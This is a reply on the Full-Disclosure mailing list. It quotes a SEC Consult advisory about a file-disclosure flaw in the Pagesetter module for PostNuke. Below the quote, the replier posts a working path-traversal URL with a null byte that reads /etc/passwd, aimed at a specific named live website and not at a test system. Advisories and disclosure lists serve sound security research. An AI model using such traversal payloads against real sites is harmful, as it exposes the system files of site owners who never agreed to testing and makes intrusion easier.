research@xxxxxxxxxxxxxxx wrote: > SEC Consult Security Advisory 20070226-0 > ======================================================================= > title: File Disclosure in Pagesetter for PostNuke > program: Pagesetter page creation module > vulnerable version: 6.2.0 > 6.3.0 beta 5 > impact: high > homepage: http://www.elfisk.dk > found: 2006-11-21 > by: D. Matscheko / SEC-CONSULT / > www.sec-consult.com > ======================================================================= > > vendor description: > --------------- > > Pagesetter is a publishing module that allows the PostNuke users to > create web pages from structured data, with the data structure and > output templates defined by the PostNuke administrator. > > [Source: http://www.elfisk.dk] > I think brendanb's going to be busy. http://www.nesco.com.au/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/